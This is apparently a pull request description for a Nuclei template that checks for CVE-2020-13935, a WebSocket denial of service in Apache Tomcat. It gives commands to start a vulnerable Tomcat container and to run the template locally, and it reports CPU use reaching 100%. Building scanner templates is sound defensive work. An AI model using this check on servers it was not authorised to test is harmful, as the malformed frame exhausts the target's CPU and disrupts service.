Template / PR Information

Wrote template for CVE-2020-13935 - Apache Tomcat WebSocket Frame Payload Length Validation Denial of Service

Checks:

• If Tomcat WebSocket echo example page exists
• If WebSocket echo example works
• If there is a read timeout after sending the malformed WebSocket Message (target is vulnerable)
• If there is no protocol error received (otherwise target is not vulnerable)

References:

• https://github.com/RedTeamPentesting/CVE-2020-13935

Template Validation

I’ve validated this template locally?

• YES
• NO

Spin up vulnerable Tomcat:

docker run --rm -it -p 8080:8080 --platform linux/amd64 --name tomcat_vulnerable --cpus 1 tomcat:8.0.51-jre8-slim

Check CPU usage - practically zero:

Run the template:

go run /Users/sttlr/tools/nuclei-dev/cmd/nuclei/main.go -code -itags dos -t /Users/sttlr/sttlr-nuclei-templates/CVE-2020-13935.yaml -u http://127.0.0.1:8080/ -v

Check CPU usage - 100%:

Additional Details (leave it blank if not applicable)

Run on dev nuclei - because code templates with engine set to go don’t work on the latest nuclei version v3.3.5 - see https://github.com/projectdiscovery/nuclei/issues/5759.

github.com/gorilla/websocket@v1.4.2 needs to be installed for the exploit to run - template tries to install in the first code block.

/claim #11019

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server